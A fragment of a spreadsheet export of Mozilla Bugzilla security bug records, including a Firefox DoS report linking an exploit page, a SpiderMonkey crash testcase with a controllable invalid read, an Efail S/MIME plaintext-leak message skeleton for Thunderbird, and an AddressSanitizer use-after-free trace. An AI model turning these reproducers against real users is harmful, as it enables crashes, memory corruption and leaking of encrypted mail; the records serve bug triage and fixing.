          <t>[sg:dos] x11 only, 1.9.0 branch only</t>
        </is>
      </c>
      <c r="Q3723" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3723" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3723" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3723" t="n">
        <v>0</v>
      </c>
      <c r="U3723" t="n">
        <v>0</v>
      </c>
      <c r="V3723" t="n">
        <v>4</v>
      </c>
      <c r="W3723" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009050806 Gentoo Firefox/3.0.10
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009050806 Gentoo Firefox/3.0.10
http://y3dips.echo.or.id/tempe/ff310expl/
detail exploit
&lt;body background="exploit.gif"&gt;
while, the exploit.gif are general gif images
Reproducible: Always</t>
        </is>
      </c>
      <c r="X3723" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3724">
      <c r="A3724" t="n">
        <v>1457664</v>
      </c>
      <c r="B3724" t="inlineStr">
        <is>
          <t>2018-04-27 22:48:39 -0700</t>
        </is>
      </c>
      <c r="C3724" t="inlineStr">
        <is>
          <t>[e2e-tests - Use generated Pipfile.lock; don't ignore Pipfile* in git, and remove constraints.txt</t>
        </is>
      </c>
      <c r="D3724" t="inlineStr">
        <is>
          <t>2018-04-30 14:16:23 -0700</t>
        </is>
      </c>
      <c r="E3724" t="n">
        <v>1</v>
      </c>
      <c r="F3724" t="n">
        <v>1</v>
      </c>
      <c r="G3724" t="n">
        <v>4</v>
      </c>
      <c r="H3724" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3724" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3724" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3724" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3724" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3724" t="inlineStr"/>
      <c r="Q3724" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3724" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3724" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3724" t="n">
        <v>1</v>
      </c>
      <c r="U3724" t="n">
        <v>0</v>
      </c>
      <c r="V3724" t="n">
        <v>4</v>
      </c>
      <c r="W3724" t="inlineStr">
        <is>
          <t>We can now remove constraints.txt[0], and use the auto-generated and SHA-hash-compared Pipfile.lock mechanism to help ensure package integrity.
[0] https://github.com/mozilla-services/socorro/blob/ecce2dffda891eeca4d121df4d864e121f9bfb63/e2e-tests/requirements/constraints.txt</t>
        </is>
      </c>
      <c r="X3724" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3725">
      <c r="A3725" t="n">
        <v>874974</v>
      </c>
      <c r="B3725" t="inlineStr">
        <is>
          <t>2013-05-22 10:44:16 -0700</t>
        </is>
      </c>
      <c r="C3725" t="inlineStr">
        <is>
          <t>Crash [@ setStringThis] with controllable invalid read</t>
        </is>
      </c>
      <c r="D3725" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:17 -0800</t>
        </is>
      </c>
      <c r="E3725" t="n">
        <v>1</v>
      </c>
      <c r="F3725" t="n">
        <v>1</v>
      </c>
      <c r="G3725" t="n">
        <v>3</v>
      </c>
      <c r="H3725" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3725" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3725" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3725" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3725" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3725" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3725" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3725" t="inlineStr">
        <is>
          <t>[jsbugmon:update,verify-branch=mozilla-aurora;mozilla-beta;mozilla-release;mozilla-esr17,ignore][adv-main23+]</t>
        </is>
      </c>
      <c r="Q3725" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3725" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3725" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3725" t="n">
        <v>1</v>
      </c>
      <c r="U3725" t="n">
        <v>0</v>
      </c>
      <c r="V3725" t="n">
        <v>29</v>
      </c>
      <c r="W3725" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision c21ef3664c67 (no options required):
var gTestcases = new Array();
var x = '';
function TestCase(n, d, e, a) {
  this.bugnumber = x;
  gTestcases[gTc++] = this;
  TestCase.prototype.dump = function () {
    this.bugnumber.toString();
  }
};
function reportCompare () {
  var testcase = new TestCase();
}
for ( gTc=0; gTc &lt; gTestcases.length; gTc++ ) {}
function jsTestDriverEnd() {
  for (var i = 0; i &lt; gTestcases.length; i++)
    gTestcases[i].dump();
}
for (var i = 0x0020; i &lt; 0x007e; i++ ) {
  new TestCase();
  new TestCase();
  new TestCase();
}
gc();
jsTestDriverEnd();
jsTestDriverEnd();
jsTestDriverEnd();
var x = 0xbeef; // Yummy!
jsTestDriverEnd();
reportCompare();
jsTestDriverEnd();</t>
        </is>
      </c>
      <c r="X3725" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3726">
      <c r="A3726" t="n">
        <v>1464056</v>
      </c>
      <c r="B3726" t="inlineStr">
        <is>
          <t>2018-05-24 06:04:02 -0700</t>
        </is>
      </c>
      <c r="C3726" t="inlineStr">
        <is>
          <t>[efail] S/MIME plaintext can be leaked through HTML reply/forward</t>
        </is>
      </c>
      <c r="D3726" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:19 -0800</t>
        </is>
      </c>
      <c r="E3726" t="n">
        <v>1</v>
      </c>
      <c r="F3726" t="n">
        <v>1</v>
      </c>
      <c r="G3726" t="n">
        <v>2</v>
      </c>
      <c r="H3726" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3726" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J3726" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3726" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3726" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3726" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3726" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3726" t="inlineStr"/>
      <c r="Q3726" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3726" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3726" t="inlineStr">
        <is>
          <t>Thunderbird 62.0</t>
        </is>
      </c>
      <c r="T3726" t="n">
        <v>1</v>
      </c>
      <c r="U3726" t="n">
        <v>0</v>
      </c>
      <c r="V3726" t="n">
        <v>52</v>
      </c>
      <c r="W3726" t="inlineStr">
        <is>
          <t>Created attachment 8980272
smime-reply-exfiltration.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20180326230345
Steps to reproduce:
A variant of Efail's direct exfiltration attack still work in TB nightly (2018-05-22). S/MIME: decrypted MIME parts can be completely hidden with CSS; if user replies/forwards in HTML format the (non-visible) plaintext is leaked, otherwise (in text-only reply mode) the victim could be fooled by inserting newlines
---------------------------------------------------
Content-Type: multipart/mixed; boundary="BOUNDARY"
--BOUNDARY
Content-Type: text/html
Reply please to this email
&lt;div style="color: red;"&gt;
--BOUNDARY
Content-Type: application/pkcs7-mime; name="smime.p7m"; smime-type=enveloped-data
Content-Transfer-Encoding: base64
...
--BOUNDARY--
---------------------------------------------------
Actual results:
Quoted S/MIME plaintext is hidden and leaked when user replies/forwards the message
Expected results:
Plaintext should in other MIME parts than the very first one should not be quoted</t>
        </is>
      </c>
      <c r="X3726" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3727">
      <c r="A3727" t="n">
        <v>785574</v>
      </c>
      <c r="B3727" t="inlineStr">
        <is>
          <t>2012-08-24 19:26:05 -0700</t>
        </is>
      </c>
      <c r="C3727" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsHTMLCSSUtils::CreateCSSPropertyTxn</t>
        </is>
      </c>
      <c r="D3727" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:32 -0700</t>
        </is>
      </c>
      <c r="E3727" t="n">
        <v>1</v>
      </c>
      <c r="F3727" t="n">
        <v>1</v>
      </c>
      <c r="G3727" t="n">
        <v>3</v>
      </c>
      <c r="H3727" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3727" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3727" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K3727" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3727" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3727" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3727" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3727" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3727" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3727" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3727" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3727" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3727" t="n">
        <v>1</v>
      </c>
      <c r="U3727" t="n">
        <v>0</v>
      </c>
      <c r="V3727" t="n">
        <v>14</v>
      </c>
      <c r="W3727" t="inlineStr">
        <is>
          <t>Created attachment 655254
Testcase
Reproduces on trunk
=================================================================
==5528== ERROR: AddressSanitizer heap-use-after-free on address 0x7fdf641dce80 at pc 0x7fdf86465da5 bp 0x7fffd539e810 sp 0x7fffd539e808
READ of size 8 at 0x7fdf641dce80 thread T0
    #0 0x7fdf86465da4 in nsHTMLCSSUtils::CreateCSSPropertyTxn(nsIDOMElement*, nsIAtom*, nsAString_internal const&amp;, ChangeCSSInlineStyleTxn**, bool) src/editor/libeditor/html/nsHTMLCSSUtils.cpp:569
    #1 0x7fdf86464c29 in nsHTMLCSSUtils::SetCSSProperty(nsIDOMElement*, nsIAtom*, nsAString_internal const&amp;, bool) src/editor/libeditor/html/nsHTMLCSSUtils.cpp:512
    #2 0x7fdf86472196 in nsHTMLCSSUtils::SetCSSEquivalentToHTMLStyle(nsIDOMNode*, nsIAtom*, nsAString_internal const*, nsAString_internal const*, int*, bool) src/editor/libeditor/html/nsHTMLCSSUtils.cpp:1012
    #3 0x7fdf86514947 in nsHTMLEditor::SetAttributeOrEquivalent(nsIDOMElement*, nsAString_internal const&amp;, nsAString_internal const&amp;, bool) src/editor/libeditor/html/nsHTMLEditor.cpp:4560
    #4 0x7fdf8667ae27 in nsHTMLEditRules::AlignBlock(nsIDOMElement*, nsAString_internal const*, bool) src/editor/libeditor/html/nsHTMLEditRules.cpp:8465
    #5 0x7fdf865e7340 in nsHTMLEditRules::WillAlign(mozilla::Selection*, nsAString_internal const*, bool*, bool*) src/editor/libeditor/html/nsHTMLEditRules.cpp:4547
    #6 0x7fdf865a58c0 in nsHTMLEditRules::WillDoAction(mozilla::Selection*, nsRulesInfo*, bool*, bool*) src/editor/libeditor/html/nsHTMLEditRules.cpp:609
    #7 0x7fdf864d22c0 in nsHTMLEditor::Align(nsAString_internal const&amp;) src/editor/libeditor/html/nsHTMLEditor.cpp:2258
    #8 0x7fdf864d2a1e in non-virtual thunk to nsHTMLEditor::Align(nsAString_internal const&amp;) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #9 0x7fdf89ac6c05 in nsAlignCommand::SetState(nsIEditor*, nsString&amp;) src/editor/composer/src/nsComposerCommands.cpp:971
    #10 0x7fdf89ababe4 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/editor/composer/src/nsComposerCommands.cpp:600
    #11 0x7fdf89324c61 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:175
    #12 0x7fdf892f7ef2 in nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:153
    #13 0x7fdf892f81c6 in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #14 0x7fdf8930e81f in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) src/embedding/components/commandhandler/src/nsCommandManager.cpp:234
    #15 0x7fdf84891e08 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/content/html/document/src/nsHTMLDocument.cpp:3232
    #16 0x7fdf8489375d in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/build/unix/stdc++compat/stdc++compat.cpp:0
    #17 0x7fdf8c8db397 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #18 0x7fdf87ea770e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3117
    #19 0x7fdf87f0a3a5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #20 0x7fdf93436b91 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
    #21 0x7fdf933c3ab0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #22 0x7fdf9332aa35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #23 0x7fdf93443ea6 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:494
    #24 0x7fdf93445e5e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:531
    #25 0x7fdf92ba0d94 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5723
    #26 0x7fdf92ba5d31 in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5804
    #27 0x7fdf8502aadf in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1506
    #28 0x7fdf851daf7f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9609
    #29 0x7fdf851928f9 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9870
    #30 0x7fdf851d8fda in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10137
    #31 0x7fdf8c81b902 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #32 0x7fdf8c81d1b8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #33 0x7fdf8c7e05ae in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
    #34 0x7fdf8c4819c7 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #35 0x7fdf8940c459 in nsXULWindow::ShowModal() src/xpfe/appshell/src/nsXULWindow.cpp:379
    #36 0x7fdf893ef880 in nsContentTreeOwner::ShowAsModal() src/xpfe/appshell/src/nsContentTreeOwner.cpp:529
    #37 0x7fdf893ef9db in non-virtual thunk to nsContentTreeOwner::ShowAsModal() src/build/unix/stdc++compat/stdc++compat.cpp:0
    #38 0x7fdf892220b0 in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:1033
    #39 0x7fdf89215fc0 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:399
    #40 0x7fdf8c8db397 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #41 0x7fdf87ea770e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3117
    #42 0x7fdf87f0a3a5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #43 0x7fdf93436b91 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
    #44 0x7fdf933c3ab0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #45 0x7fdf9332aa35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #46 0x7fdf93437205 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:363
    #47 0x7fdf92cd1ffc in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #48 0x7fdf9343c54b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:396
    #49 0x7fdf92badd7b in JS_CallFunctionValue src/js/src/jsapi.cpp:5904
    #50 0x7fdf87e563a2 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1436
    #51 0x7fdf87dfad06 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:580
    #52 0x7fdf8c8e0e56 in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #53 0x7fdf8c8de126 in SharedStub src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #54 0x7fdf8c8db397 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #55 0x7fdf87ea770e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3117
    #56 0x7fdf87f0a3a5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #57 0x7fdf93436b91 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
    #58 0x7fdf933c3ab0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #59 0x7fdf9332aa35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #60 0x7fdf93437205 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:363
    #61 0x7fdf92cd1ffc in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #62 0x7fdf930e0690 in js::CallOrConstructBoundFunction(JSContext*, unsigned int, JS::Value*) src/js/src/jsfun.cpp:1029
    #63 0x7fdf93436b92 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
0x7fdf641dce80 is located 0 bytes inside of 16-byte region [0x7fdf641dce80,0x7fdf641dce90)
freed by thread T0 here:
    #0 0x4c3d80 in free ??:0
    #1 0x7fdf99a75572 in moz_free src/memory/mozalloc/mozalloc.cpp:51
    #2 0x7fdf86539480 in operator delete(void*) src/../../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fdf86491dc7 in nsAutoPtr&lt;nsHTMLCSSUtils&gt;::operator=(nsHTMLCSSUtils*) src/../../../dist/include/nsAutoPtr.h:101
    #4 0x7fdf8649058c in nsHTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int) src/editor/libeditor/html/nsHTMLEditor.cpp:249
    #5 0x7fdf89b04aae in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) src/editor/composer/src/nsEditingSession.cpp:460
    #6 0x7fdf89afa507 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) src/editor/composer/src/nsEditingSession.cpp:173
    #7 0x7fdf84861d10 in nsHTMLDocument::EditingStateChanged() src/content/html/document/src/nsHTMLDocument.cpp:2693
    #8 0x7fdf8485f249 in nsHTMLDocument::BeginLoad() src/content/html/document/src/nsHTMLDocument.cpp:880
    #9 0x7fdf862fcfe2 in nsHtml5TreeOpExecutor::WillBuildModel(nsDTDMode) src/parser/html/nsHtml5TreeOpExecutor.cpp:116
    #10 0x7fdf860ef40b in nsHtml5Parser::Parse(nsAString_internal const&amp;, void*, nsACString_internal const&amp;, bool, nsDTDMode) src/parser/html/nsHtml5Parser.cpp:231
    #11 0x7fdf8487780f in nsHTMLDocument::Close() src/content/html/document/src/nsHTMLDocument.cpp:1606
    #12 0x7fdf84877bdb in non-virtual thunk to nsHTMLDocument::Close() src/build/unix/stdc++compat/stdc++compat.cpp:0
    #13 0x7fdf8c8db397 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #14 0x7fdf87ea770e in CallMethodHelper::Invoke() src/js/xpconnect/src/XPCWrappedNative.cpp:3117
    #15 0x7fdf87f0a3a5 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480
    #16 0x7fdf93436b91 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
    #17 0x7fdf92cd1ffc in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #18 0x7fdf9343c54b in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:396
    #19 0x7fdf938b0f9c in js::IndirectProxyHandler::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:477
    #20 0x7fdf94071a40 in js::DirectWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jswrapper.cpp:318
    #21 0x7fdf9408672d in js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jswrapper.cpp:731
    #22 0x7fdf94086d54 in non-virtual thunk to js::CrossCompartmentWrapper::call(JSContext*, JSObject*, unsigned int, JS::Value*) ??:0
    #23 0x7fdf938f5977 in js::Proxy::call(JSContext*, JSObject*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:1320
    #24 0x7fdf9391020c in proxy_Call(JSContext*, unsigned int, JS::Value*) src/js/src/jsproxy.cpp:1856
    #25 0x7fdf9343650d in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:389
    #26 0x7fdf933c3ab0 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2413
    #27 0x7fdf9332aa35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #28 0x7fdf93437205 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:363
    #29 0x7fdf92cd1ffd in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
previously allocated by thread T0 here:
    #0 0x4c3e40 in __interceptor_malloc ??:0
    #1 0x7fdf99a756c6 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:57
    #2 0x7fdf8649055f in operator new(unsigned long) src/../../../dist/include/mozilla/mozalloc.h:200
    #3 0x7fdf89b04aae in nsEditingSession::SetupEditorOnWindow(nsIDOMWindow*) src/editor/composer/src/nsEditingSession.cpp:460
    #4 0x7fdf89afa507 in nsEditingSession::MakeWindowEditable(nsIDOMWindow*, char const*, bool, bool, bool) src/editor/composer/src/nsEditingSession.cpp:173
    #5 0x7fdf84861d10 in nsHTMLDocument::EditingStateChanged() src/content/html/document/src/nsHTMLDocument.cpp:2693
    #6 0x7fdf8488dc6c in nsHTMLDocument::SetDesignMode(nsAString_internal const&amp;) src/content/html/document/src/nsHTMLDocument.cpp:2834
    #7 0x7fdf88721cde in nsIDOMHTMLDocument_SetDesignMode(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:13862
    #8 0x7fdf936b2903 in js::CallJSPropertyOpSetter(JSContext*, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;), JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::MutableHandle&lt;JS::Value&gt;) src/js/src/jscntxtinlines.h:469
    #9 0x7fdf936e7e34 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::MutableHandle&lt;JS::Value&gt;, int) src/js/src/jsobj.cpp:4853
    #10 0x7fdf9347beb5 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) src/js/src/jsinterpinlines.h:345
    #11 0x7fdf933b6700 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2323
    #12 0x7fdf9332aa35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:309
    #13 0x7fdf93443ea6 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) src/js/src/jsinterp.cpp:494
    #14 0x7fdf93445e5e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) src/js/src/jsinterp.cpp:531
    #15 0x7fdf92ba0d94 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) src/js/src/jsapi.cpp:5723
    #16 0x7fdf92ba5d31 in JS_EvaluateUCScriptForPrincipalsVersionOrigin src/js/src/jsapi.cpp:5804
    #17 0x7fdf8502aadf in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) src/dom/base/nsJSEnvironment.cpp:1506
    #18 0x7fdf851daf7f in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) src/dom/base/nsGlobalWindow.cpp:9609
    #19 0x7fdf851928f9 in nsGlobalWindow::RunTimeout(nsTimeout*) src/dom/base/nsGlobalWindow.cpp:9870
    #20 0x7fdf851d8fda in nsGlobalWindow::TimerCallback(nsITimer*, void*) src/dom/base/nsGlobalWindow.cpp:10137
    #21 0x7fdf8c81b902 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:473
    #22 0x7fdf8c81d1b8 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:556
    #23 0x7fdf8c7e05ae in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:624
